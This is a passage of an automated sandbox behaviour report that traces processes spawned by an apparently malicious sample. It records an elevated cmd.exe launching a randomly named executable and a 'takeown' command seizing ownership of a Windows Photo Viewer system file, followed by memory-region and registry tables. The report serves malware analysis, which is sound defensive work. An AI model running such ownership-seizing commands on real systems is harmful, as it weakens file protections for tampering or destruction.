| ID | #255 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c qRY2vco2.exe -accepteula "Shorthand.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:01, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x638 |
| Parent PID | 0x8e0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
6B8
0x
9B8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000490000 | 0x00490000 | 0x0448ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004490000 | 0x04490000 | 0x044affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004490000 | 0x04490000 | 0x0449ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000044a0000 | 0x044a0000 | 0x044a3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044b0000 | 0x044b0000 | 0x044b1fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000044c0000 | 0x044c0000 | 0x044d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000044e0000 | 0x044e0000 | 0x0451ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004520000 | 0x04520000 | 0x0461ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004620000 | 0x04620000 | 0x04623fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004630000 | 0x04630000 | 0x04630fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004640000 | 0x04640000 | 0x04641fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04650000 | 0x0470dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004710000 | 0x04710000 | 0x0474ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004750000 | 0x04750000 | 0x0475ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004760000 | 0x04760000 | 0x0495ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004760000 | 0x04760000 | 0x0485ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004860000 | 0x04860000 | 0x0495ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004960000 | 0x04960000 | 0x04aeffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ef30000 | 0x7ef30000 | 0x7f02ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f030000 | 0x7f030000 | 0x7f052fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f057000 | 0x7f057000 | 0x7f057fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f059000 | 0x7f059000 | 0x7f05bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f05c000 | 0x7f05c000 | 0x7f05efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f05f000 | 0x7f05f000 | 0x7f05ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
2 | |
| Open | STD_INPUT_HANDLE | - |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 168, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (4)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 |
Environment (9)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
3 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 |
Process #256: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #256 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:01, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xecc |
| Parent PID | 0x7fc (c:\windows\syswow64\takeown.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C54
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000009a0000 | 0x009a0000 | 0x009bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000009a0000 | 0x009a0000 | 0x009affff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000009c0000 | 0x009c0000 | 0x009c1fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000009d0000 | 0x009d0000 | 0x009e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000009f0000 | 0x009f0000 | 0x00a2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000a30000 | 0x00a30000 | 0x00a6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000a70000 | 0x00a70000 | 0x00a73fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a80000 | 0x00a80000 | 0x00a80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000a90000 | 0x00a90000 | 0x00a91fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c30000 | 0x00c30000 | 0x00c3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c40000 | 0x00c40000 | 0x00e2ffff | Private Memory | rw |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e4f0000 | 0x7e4f0000 | 0x7e5effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e5f0000 | 0x7e5f0000 | 0x7e612fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e618000 | 0x7e618000 | 0x7e618fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e61c000 | 0x7e61c000 | 0x7e61efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e61f000 | 0x7e61f000 | 0x7e61ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
